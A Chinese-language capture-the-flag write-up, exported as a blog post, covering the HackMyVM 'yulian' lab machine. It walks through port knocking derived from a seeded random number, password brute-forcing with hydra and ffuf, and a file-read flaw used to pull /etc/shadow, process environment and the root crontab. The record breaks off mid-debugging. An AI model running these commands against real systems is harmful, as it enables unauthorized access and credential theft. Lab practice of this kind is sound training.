{"id":932,"date":"2026-01-18T19:00:37","date_gmt":"2026-01-18T11:00:37","guid":{"rendered":"http:\/\/162.14.82.114\/?p=932"},"modified":"2026-01-18T19:00:37","modified_gmt":"2026-01-18T11:00:37","slug":"hmv-_-yulian","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/932\/01\/18\/2026\/","title":{"rendered":"hmv[-_-]yulian"},"content":{"rendered":"

yulian<\/h1>\n

\"image-20260110153201940\"<\/div>
\n
\"image-20260110152923681\"<\/div><\/p>\n
\n

\u7b2c\u4e00\u6b21\u4f7f\u7528mac\u6253\u9776\u673a\uff0c\u633a\u597d\u73a9\u7684\uff0c\u914d\u7f6e\u9776\u673a\u53ef\u4ee5\u53c2\u8003todd\u7684\u8fdc\u53e4\u89c6\u9891<\/a>\uff0c\u5f88\u597d\u7528\u3002<\/p>\n<\/blockquote>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
pwn@ubuntu:~\/temp\/yulian$ rustscan --no-banner -a $IP --ulimit 5000\n[~] Automatically increasing ulimit value to 5000.\nOpen 192.168.64.4:22\nOpen 192.168.64.4:80\n[~] Starting Script(s)\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2026-01-10 07:38 UTC\nInitiating Ping Scan at 07:38\nScanning 192.168.64.4 [2 ports]\nCompleted Ping Scan at 07:38, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 07:38\nCompleted Parallel DNS resolution of 1 host. at 07:38, 0.00s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 07:38\nScanning 192.168.64.4 [2 ports]\nDiscovered open port 22\/tcp on 192.168.64.4\nDiscovered open port 80\/tcp on 192.168.64.4\nCompleted Connect Scan at 07:38, 0.00s elapsed (2 total ports)\nNmap scan report for 192.168.64.4\nHost is up, received syn-ack (0.0012s latency).\nScanned at 2026-01-10 07:38:47 UTC for 0s\n\nPORT   STATE SERVICE REASON\n22\/tcp open  ssh     syn-ack\n80\/tcp open  http    syn-ack\n\nRead data files from: \/usr\/bin\/..\/share\/nmap\nNmap done: 1 IP address (1 host up) scanned in 0.20 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
pwn@ubuntu:~\/temp\/yulian$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.64.4\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 220559 \/ 220560 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
pwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP\n<!DOCTYPE html>\n<html lang="en">\n<head>\n  <meta charset="UTF-8">\n  <title>Linux Terminal Simulator<\/title>\n  <style>\n    body {\n      background-color: #000;\n      color: #00ff00;\n      font-family: monospace;\n      margin: 0;\n      padding: 10px;\n    }\n    #terminal {\n      white-space: pre-wrap;\n      min-height: 90vh;\n      overflow-y: auto;\n    }\n    .line {\n      display: flex;\n      flex-wrap: wrap;\n    }\n    input {\n      background: none;\n      border: none;\n      color: #00ff00;\n      font-family: monospace;\n      font-size: 1em;\n      outline: none;\n      flex: 1;\n    }\n    ::selection {\n      background: #008000;\n    }\n  <\/style>\n<\/head>\n<body>\n  <div id="terminal"><\/div>\n\n  <script>\n    const terminal = document.getElementById("terminal");\n\n    const fileSystem = {\n      "home": {\n        "user": {\n          "file1.txt": "Hello, this is file1.",\n          "notes.md": "# Notes\\nThis is a markdown file."\n        }\n      },\n      "var": {\n        "log.txt": "System log content here."\n      },\n      "opt":{\n        "code":{\n            "test.c":`#include<stdio.h>\n#include<stdlib.h>\n\nint main()\n{\n        srand(114514);\n        for(int i = 0; i < 114514; i++)\n        {\n                rand();\n        }\n        printf("%d\\\\n",rand()%65535);\n\n        printf("%d\\\\n",rand()%65535);\n\n        printf("%d\\\\n",rand()%65535);\n\n        return 0;\n}`\n        }\n      }\n\n    };\n\n    let currentPath = ["home", "user"];\n    let history = [];\n    let historyIndex = -1;\n\n    function getDir(pathArr, fs) {\n      let node = fs;\n      for (let part of pathArr) {\n        if (node[part] && typeof node[part] === 'object') {\n          node = node[part];\n        } else {\n          return null;\n        }\n      }\n      return node;\n    }\n\n    function getPathString() {\n      return "\/" + currentPath.join("\/");\n    }\n\n    function renderPrompt() {\n      return `user@linux:${getPathString()}$ `;\n    }\n\n    function printOutput(prompt, input, output) {\n      const block = document.createElement("div");\n      block.innerHTML = `\n        <div>${prompt}${input}<\/div>\n        <div>${output}<\/div>\n      `;\n      terminal.appendChild(block);\n    }\n\n    function createInputLine() {\n      const line = document.createElement("div");\n      line.className = "line";\n\n      const promptSpan = document.createElement("span");\n      promptSpan.textContent = renderPrompt();\n\n      const input = document.createElement("input");\n      input.type = "text";\n      input.autofocus = true;\n\n      line.appendChild(promptSpan);\n      line.appendChild(input);\n      terminal.appendChild(line);\n\n      input.focus();\n\n      input.addEventListener("keydown", (e) => {\n        if (e.key === "Enter") {\n          const value = input.value.trim();\n          input.disabled = true;\n          runCommand(value);\n        } else if (e.key === "ArrowUp") {\n          if (historyIndex > 0) {\n            historyIndex--;\n            input.value = history[historyIndex];\n          }\n        } else if (e.key === "ArrowDown") {\n          if (historyIndex < history.length - 1) {\n            historyIndex++;\n            input.value = history[historyIndex];\n          } else {\n            input.value = "";\n          }\n        }\n      });\n    }\n\n    function runCommand(input) {\n      const prompt = renderPrompt();\n      if (input !== "") {\n        history.push(input);\n        historyIndex = history.length;\n      }\n\n      function escapeHTML(str) {\n            return str.replace(\/&\/g, "&").replace(\/<\/g, "<").replace(\/>\/g, ">");\n    }\n\n      const args = input.split(" ");\n      const cmd = args[0];\n      const param = args.slice(1);\n      const currentDir = getDir(currentPath, fileSystem);\n      let output = "";\n\n      switch (cmd) {\n        case "help":\n          output = "command: help, clear, echo, ls, cd, cat, date";\n          break;\n        case "clear":\n          terminal.innerHTML = "";\n          createInputLine();\n          return;\n        case "echo":\n          output = param.join(" ");\n          break;\n        case "date":\n          output = new Date().toString();\n          break;\n        case "ls":\n          if (currentDir) {\n            output = Object.keys(currentDir).join("  ");\n          } else {\n            output = "Unable to access current directory";\n          }\n          break;\n        case "cd":\n          if (param.length === 0 || param[0] === "~") {\n            currentPath = ["home", "user"];\n          } else if (param[0] === "..") {\n            if (currentPath.length > 0) currentPath.pop();\n          } else {\n            const target = param[0];\n            const newPath = [...currentPath, target];\n            const targetDir = getDir(newPath, fileSystem);\n            if (targetDir && typeof targetDir === "object") {\n              currentPath = newPath;\n            } else {\n              output = `cd: no such directory: ${target}`;\n            }\n          }\n          break;\n        case "cat":\n          if (param.length === 0) {\n            output = "cat: Requires filename parameter";\n          } else {\n            const file = param[0];\n            if (currentDir[file] && typeof currentDir[file] === "string") {\n              output = escapeHTML(currentDir[file]);\n            } else {\n              output = `cat: File not found ${file}`;\n            }\n          }\n          break;\n        case "":\n          output = "";\n          break;\n        default:\n          output = `command not found: ${cmd}`;\n      }\n\n      printOutput(prompt, input, output);\n      createInputLine();\n      terminal.scrollTop = terminal.scrollHeight;\n    }\n\n    createInputLine();\n    terminal.addEventListener("click", () => {\n      const inputs = terminal.querySelectorAll("input");\n      if (inputs.length > 0) inputs[inputs.length - 1].focus();\n    });\n  <\/script>\n<\/body>\n<\/html><\/code><\/pre>\n
\u53d1\u73b0\u4e00\u4e2a\u8bbe\u5b9a\u4e86\u79cd\u5b50\u7684\u968f\u673a\u6570\uff1a<\/p>\n
#include<stdlib.h>\n\nint main()\n{\n        srand(114514);\n        for(int i = 0; i < 114514; i++)\n        {\n                rand();\n        }\n        printf("%d\\\\n",rand()%65535);\n\n        printf("%d\\\\n",rand()%65535);\n\n        printf("%d\\\\n",rand()%65535);\n\n        return 0;\n}<\/code><\/pre>\n
\u5047\u968f\u673a\u6570knock<\/h3>\n
\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u968f\u673a\u6570\u662f\u5565\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ gcc knock.c\nknock.c: In function \u2018main\u2019:\nknock.c:10:9: warning: implicit declaration of function \u2018printf\u2019 [-Wimplicit-function-declaration]\n   10 |         printf("%d\\\\n",rand()%65535);\n      |         ^~~~~~\nknock.c:2:1: note: include \u2018<stdio.h>\u2019 or provide a declaration of \u2018printf\u2019\n    1 | #include<stdlib.h>\n  +++ |+#include <stdio.h>\n    2 |\nknock.c:10:9: warning: incompatible implicit declaration of built-in function \u2018printf\u2019 [-Wbuiltin-declaration-mismatch]\n   10 |         printf("%d\\\\n",rand()%65535);\n      |         ^~~~~~\nknock.c:10:9: note: include \u2018<stdio.h>\u2019 or provide a declaration of \u2018printf\u2019\npwn@ubuntu:~\/temp\/yulian$ ls -la\ntotal 28\ndrwxrwxr-x 2 pwn pwn  4096 Jan 10 08:22 .\ndrwxrwxr-x 3 pwn pwn  4096 Jan 10 07:54 ..\n-rwxrwxr-x 1 pwn pwn 16032 Jan 10 08:22 a.out\n-rw-rw-r-- 1 pwn pwn   278 Jan 10 08:21 knock.c\npwn@ubuntu:~\/temp\/yulian$ .\/a.out\n6440\\n17226\\n31925\\npwn@ubuntu:~\/temp\/yulian$ .\/a.out\n6440\\n17226\\n31925\\n<\/code><\/pre>\n
\u5c1d\u8bd5knock<\/code>\u4e00\u4e0b6440,17226,31925<\/code>\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ knock $IP 6440 17226 31925\npwn@ubuntu:~\/temp\/yulian$ nmap $IP\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2026-01-17 03:28 UTC\nNmap scan report for 192.168.64.4 (192.168.64.4)\nHost is up (0.0016s latency).\nNot shown: 997 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n8080\/tcp open  http-proxy\n\nNmap done: 1 IP address (1 host up) scanned in 0.46 seconds<\/code><\/pre>\n
\u53d1\u73b08080<\/code>\u5f00\u653e\u4e86\uff0c\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ gobuster dir -u http:\/\/$IP:8080 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-medium.txt -x html,php,txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.64.4:8080\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/download             (Status: 400) [Size: 158]\n\/login                (Status: 405) [Size: 149]\n\/login.html           (Status: 200) [Size: 2270]\n\/test                 (Status: 200) [Size: 39]\n\/logout               (Status: 302) [Size: 0] [--> http:\/\/192.168.64.4:8080\/login.html]\n\/success              (Status: 200) [Size: 47]\n\/error                (Status: 500) [Size: 105]<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u51e0\u4e2a\u57fa\u7840\u7684\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP:8080\/test\n<h1>Website is under development.......\npwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP:8080\/success\n<script>window.location='\/login.html';<\/script>\npwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP:8080\/download\n{"timestamp":"2026-01-10T08:39:10.684+0000","status":400,"error":"Bad Request","message":"Required String parameter 'file' is not present","path":"\/download"}<\/code><\/pre>\n
FUZZ<\/h3>\n
\u65f6\u95f4\u5bf9\u4e0d\u4e0a\u662f\u56e0\u4e3a\u9776\u673a\u662f\u524d\u51e0\u5929\u4e0b\u7684\u3002\u3002\u3002\u3002\u3002\u3002\u53d1\u73b0\u9700\u8981\u8bf7\u6c42\u4e00\u4e2afile<\/code>\u53c2\u6570\uff0c\u53ef\u4ee5\u5c1d\u8bd5fuzz\u4e00\u4e0b\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ ffuf -u http:\/\/$IP:8080\/?file=FUZZ -w \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt -fs 0\n\n        \/'___\\  \/'___\\           \/'___\\\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/\n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.64.4:8080\/?file=FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\n:: Progress: [881\/881] :: Job [1\/1] :: 550 req\/sec :: Duration: [0:00:01] :: Errors: 0 ::<\/code><\/pre>\n
\u53d1\u73b0\u4e00\u65e0\u6240\u83b7\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u7684\u65b9\u5411\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP:8080\/login\n{"timestamp":"2026-01-10T08:52:54.050+0000","status":405,"error":"Method Not Allowed","message":"Request method 'GET' not supported","path":"\/login"}\n\npwn@ubuntu:~\/temp\/yulian$ curl -s http:\/\/$IP:8080\/login.html\n<!DOCTYPE html>\n<head>\n    <meta charset="UTF-8">\n    <title>Login<\/title>\n    <style>\n        body {\n            font-family: 'Segoe UI', sans-serif;\n            background: linear-gradient(to right, #74ebd5, #ACB6E5);\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            height: 100vh;\n            margin: 0;\n        }\n\n        .login-container {\n            background: white;\n            padding: 40px;\n            border-radius: 12px;\n            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);\n            width: 300px;\n        }\n\n        .login-container h2 {\n            text-align: center;\n            margin-bottom: 24px;\n            color: #333;\n        }\n\n        .login-container input[type="text"],\n        .login-container input[type="password"] {\n            width: 100%;\n            padding: 12px;\n            margin-bottom: 20px;\n            border: 1px solid #ccc;\n            border-radius: 8px;\n            box-sizing: border-box;\n        }\n\n        .login-container input[type="submit"] {\n            width: 100%;\n            padding: 12px;\n            background-color: #4CAF50;\n            color: white;\n            border: none;\n            border-radius: 8px;\n            cursor: pointer;\n            font-size: 16px;\n        }\n\n        .login-container input[type="submit"]:hover {\n            background-color: #45a049;\n        }\n\n        .message {\n            color: red;\n            text-align: center;\n            margin-top: 10px;\n        }\n    <\/style>\n<\/head>\n<body>\n<div class="login-container">\n    <h2>Login<\/h2>\n    <form method="post" action="\/login">\n        <input type="text" name="username" placeholder="user" required>\n        <input type="password" name="password" placeholder="pass" required>\n        <input type="submit" value="Login">\n    <\/form>\n    <div class="message">\n        <span id="error-message"><\/span>\n    <\/div>\n<\/div>\n<script>\n    const urlParams = new URLSearchParams(window.location.search);\n    const error = urlParams.get('error');\n    if (error) {\n        document.getElementById('error-message').innerText = decodeURIComponent(error);\n    }\n<\/script>\n<\/body>\n<\/html><\/code><\/pre>\n
\u53d1\u73b0\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff1a<\/p>\n
\"image-20260117115559282\"<\/div><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ hydra -l admin -P \/usr\/share\/rockyou.txt -s 8080 $IP http-post-form "\/login.html:username=^USER^&password=^PASS^&submit=login:Wrong"\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2026-01-17 04:15:48\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.64.4:8080\/login.html:username=^USER^&password=^PASS^&submit=login:Wrong\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: babygirl\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: daniel\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: 1234567\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: rockyou\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: 12345678\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: 12345\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: abc123\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: jessica\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: princess\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: iloveyou\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: 123456789\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: password\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: monkey\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: lovely\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: nicole\n[8080][http-post-form] host: 192.168.64.4   login: admin   password: 123456\n1 of 1 target successfully completed, 16 valid passwords found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2026-01-17 04:15:54<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\u4e00\u4e0b\uff0c\u53d1\u73b0\u5931\u8d25\u4e86\uff0c\u5947\u602a\u4e86\uff0c\u53ef\u80fd\u662f\u54ea\u91cc\u5f04\u9519\u4e86\uff1f\u5c1d\u8bd5\u91cd\u65b0\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ ffuf -u http:\/\/192.168.64.4:8080\/login -X POST -d "username=admin&password=FUZZ" -w \/usr\/share\/rockyou.txt -H "Content-type: application\/x-www-form-urlencoded"  -fr "wrong" -H "Referer: http:\/\/192.168.64.4:8080\/login.html"<\/code><\/pre>\n
\u53d1\u73b0\u6e05\u4e00\u8272\u7684302<\/code>\uff0c\u53d1\u73b0\u5728\u8df3\u8f6c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8ddf\u968f\u8df3\u8f6c  -r     Follow redirects (default: false)<\/code>\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ ffuf -u http:\/\/$IP:8080\/login -X POST -d "username=admin&password=FUZZ" -w \/usr\/share\/rockyou.txt -H "Content-type: application\/x-www-form-urlencoded"  -fr "wrong" -H "Referer: http:\/\/192.168.64.4:8080\/login.html" -r\n\n        \/'___\\  \/'___\\           \/'___\\\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/\n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : POST\n :: URL              : http:\/\/192.168.64.4:8080\/login\n :: Wordlist         : FUZZ: \/usr\/share\/rockyou.txt\n :: Header           : Content-Type: application\/x-www-form-urlencoded\n :: Header           : Referer: http:\/\/192.168.64.4:8080\/login.html\n :: Data             : username=admin&password=FUZZ\n :: Follow redirects : true\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Regexp: wrong\n________________________________________________\n\n123457                  [Status: 200, Size: 47, Words: 1, Lines: 1, Duration: 245ms]<\/code><\/pre>\n
\u627e\u5230\u4e86\u4e00\u4e2a\u5bc6\u7801123457<\/code>\uff0c\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff1a<\/p>\n
\"image-20260117130821210\"<\/div><\/p>\n
\u8df3\u8f6c\u4e86\uff01\uff01\uff01\uff01<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ curl -X POST http:\/\/$IP:8080\/login\/ -d "username=admin&password=123457" -vvv\nNote: Unnecessary use of -X or --request, POST is already inferred.\n*   Trying 192.168.64.4:8080...\n* Connected to 192.168.64.4 (192.168.64.4) port 8080\n> POST \/login\/ HTTP\/1.1\n> Host: 192.168.64.4:8080\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> Content-Length: 30\n> Content-Type: application\/x-www-form-urlencoded\n>\n< HTTP\/1.1 302\n< Set-Cookie: auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=; Path=\/; HttpOnly\n< Location: http:\/\/192.168.64.4:8080\/success\n< Content-Length: 0\n< Date: Sat, 10 Jan 2026 10:18:00 GMT\n<\n* Connection #0 to host 192.168.64.4 left intact<\/code><\/pre>\n
\u53d1\u73b0\u8bbe\u7f6e\u4e86 cookie\uff0c\u5c1d\u8bd5\u5e26\u7740cookie\u8fdb\u884cfuzz\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ ffuf -u http:\/\/$IP:8080\/download?file=FUZZ -w \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt -H "Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI="\n\n        \/'___\\  \/'___\\           \/'___\\\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/\n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.64.4:8080\/download?file=FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt\n :: Header           : Cookie: auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n\/proc\/version           [Status: 200, Size: 167, Words: 18, Lines: 2, Duration: 70ms]\n\/proc\/cpuinfo           [Status: 200, Size: 951, Words: 120, Lines: 28, Duration: 122ms]\n\/etc\/passwd             [Status: 200, Size: 1224, Words: 3, Lines: 29, Duration: 529ms]\n\/etc\/issue              [Status: 200, Size: 53, Words: 10, Lines: 4, Duration: 514ms]\n\/proc\/mounts            [Status: 200, Size: 1918, Words: 116, Lines: 24, Duration: 126ms]\n\/proc\/ioports           [Status: 200, Size: 1008, Words: 200, Lines: 41, Duration: 135ms]\n\/etc\/mtab               [Status: 200, Size: 1918, Words: 116, Lines: 24, Duration: 344ms]\n\/etc\/resolv.conf        [Status: 200, Size: 24, Words: 2, Lines: 2, Duration: 251ms]\n\/proc\/filesystems       [Status: 200, Size: 275, Words: 1, Lines: 23, Duration: 122ms]\n\/etc\/profile            [Status: 200, Size: 259, Words: 51, Lines: 12, Duration: 310ms]\n\/etc\/motd               [Status: 200, Size: 283, Words: 34, Lines: 11, Duration: 395ms]\n\/etc\/fstab              [Status: 200, Size: 89, Words: 5, Lines: 3, Duration: 587ms]\n\/etc\/shadow             [Status: 200, Size: 441, Words: 1, Lines: 29, Duration: 627ms]\n\/etc\/inittab            [Status: 200, Size: 570, Words: 47, Lines: 24, Duration: 623ms]\n\/proc\/modules           [Status: 200, Size: 5939, Words: 531, Lines: 107, Duration: 194ms]\n\/proc\/self\/net\/arp      [Status: 200, Size: 156, Words: 78, Lines: 3, Duration: 225ms]\n\/proc\/meminfo           [Status: 200, Size: 1475, Words: 529, Lines: 54, Duration: 278ms]\n\/proc\/interrupts        [Status: 200, Size: 1885, Words: 647, Lines: 39, Duration: 311ms]\n\/proc\/swaps             [Status: 200, Size: 104, Words: 32, Lines: 3, Duration: 327ms]\n\/proc\/stat              [Status: 200, Size: 785, Words: 295, Lines: 10, Duration: 355ms]\n\/etc\/hosts              [Status: 200, Size: 174, Words: 3, Lines: 8, Duration: 825ms]\n\/var\/spool\/cron\/crontabs\/root [Status: 200, Size: 283, Words: 10, Lines: 9, Duration: 141ms]\n\/etc\/ca-certificates.conf [Status: 200, Size: 6285, Words: 14, Lines: 153, Duration: 62ms]\n\/etc\/hostname           [Status: 200, Size: 13, Words: 1, Lines: 2, Duration: 30ms]\n\/etc\/group              [Status: 200, Size: 697, Words: 1, Lines: 49, Duration: 67ms]\n\/etc\/modules            [Status: 200, Size: 15, Words: 1, Lines: 3, Duration: 73ms]\n\/etc\/os-release         [Status: 200, Size: 162, Words: 4, Lines: 7, Duration: 73ms]\n\/etc\/sysctl.conf        [Status: 200, Size: 53, Words: 8, Lines: 2, Duration: 99ms]\n\/proc\/devices           [Status: 200, Size: 515, Words: 90, Lines: 56, Duration: 23ms]\n\/proc\/self\/stat         [Status: 200, Size: 311, Words: 52, Lines: 2, Duration: 69ms]\n\/proc\/net\/udp           [Status: 200, Size: 128, Words: 36, Lines: 2, Duration: 129ms]\n\/proc\/self\/mounts       [Status: 200, Size: 1918, Words: 116, Lines: 24, Duration: 69ms]\n\/proc\/self\/fd\/0         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 179ms]\n\/proc\/self\/status       [Status: 200, Size: 1142, Words: 99, Lines: 60, Duration: 106ms]\n\/proc\/net\/tcp           [Status: 200, Size: 6600, Words: 2167, Lines: 45, Duration: 300ms]\n\/proc\/self\/environ      [Status: 200, Size: 433, Words: 1, Lines: 1, Duration: 350ms]\n\/proc\/self\/cmdline      [Status: 200, Size: 40, Words: 1, Lines: 1, Duration: 448ms]\n\/proc\/self\/fd\/6         [Status: 200, Size: 375889, Words: 1062, Lines: 1404, Duration: 174ms]\n\/proc\/self\/fd\/13        [Status: 500, Size: 180, Words: 10, Lines: 1, Duration: 996ms]\n\/proc\/self\/fd\/14        [Status: 500, Size: 180, Words: 10, Lines: 1, Duration: 1008ms]<\/code><\/pre>\n
\u5c1d\u8bd5\u5199\u4e00\u4e2a\u811a\u672c\u8fdb\u884c\u63d0\u53d6\u76f8\u5173\u7cfb\u7edf\u6d88\u606f\uff0c\u76f4\u63a5 AI \u5927\u6cd5\uff0c\u53ef\u4ee5\u81ea\u5df1\u5199\u4f46\u6ca1\u5fc5\u8981\uff08\u72d7\u5934\u4fdd\u547d.jpg)\uff0c\u4f46\u662f\u8fd0\u884c\u4ee5\u540e\u597d\u770b\u662f\u597d\u770b\u4e86\uff0c\u4f46\u662f\u6709\u5947\u5947\u602a\u602a\u7684\u9519\u8bef\uff0c\u54b1\u4eec\u7b80\u5355\u5904\u7406\u4e00\u4e0b\u5427\uff1a<\/p>\n
# ffuf -u http:\/\/$IP:8080\/download?file=FUZZ -w \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt -H "Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=" > temp\n# awk '{ print $1 }' temp > temp1\n# mkdir result; cd $_\n# while read -r path; do touch $(basename "$path"); done < ..\/temp1\n# cd ..\nwhile read -r path; do curl -s "http:\/\/192.168.64.4:8080\/download?file=$path" -H 'Cookie:auth=admin:S+jYmswX8+Lnl8Y+X7auaMMN5AHvFyKZMJluN\/qPCFI=' > basename $path; done < ..\/temp1<\/code><\/pre>\n
\u53d1\u73b0\u603b\u662f\u5931\u8d25\uff0c\u770b\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u88ab\u524d\u9762\u6709\u8f6c\u4e49\u5b57\u7b26\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian\/result$ cat -A ..\/temp1\n^M^[[2K\/etc\/passwd$\n^M^[[2K\/etc\/shadow$\n^M^[[2K\/etc\/hosts$\n^M^[[2K\/etc\/motd$\n^M^[[2K\/etc\/mtab$\n^M^[[2K\/etc\/issue$\n^M^[[2K\/etc\/resolv.conf$\n^M^[[2K\/etc\/fstab$\n^M^[[2K\/etc\/profile$\n^M^[[2K\/etc\/inittab$\n^M^[[2K\/proc\/filesystems$\n^M^[[2K\/proc\/modules$\n-------------<\/code><\/pre>\n
